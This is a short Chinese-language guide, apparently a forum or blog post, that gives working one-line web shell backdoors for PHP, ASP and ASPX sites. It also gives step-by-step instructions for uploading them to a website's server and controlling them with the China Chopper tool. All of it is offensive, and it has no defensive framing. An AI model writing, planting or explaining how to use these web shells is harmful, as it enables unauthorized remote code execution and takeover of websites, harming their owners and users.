php的一句話木馬: <?php @eval($_POST['pass']);?>
asp的一句話木馬是: <%eval request ("pass")%>
aspx的一句話木馬是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
其中pass爲設置的密碼,可修改
操作方法:
新建txt文件,將與網站對應的代碼黏貼進去,然後保存,修改txt文檔格式爲複製的代碼格式如:xx.php,把文件上傳到網站後臺服務器當中即可。
注:直接放入head頭部雖然也可以,但會出現網絡攔截錯誤。同時使用網站路徑+文件名的格式驗證(http://www.xxxx.com/xx.php)是否放入正確,驗證成功是一個空頁面不會出現404
菜刀使用:
進入chopper.exe,右鍵添加,域名哪裏填上(http://www.xxxx.com/xx.php),然後輸入密碼pass,然後確認添加即可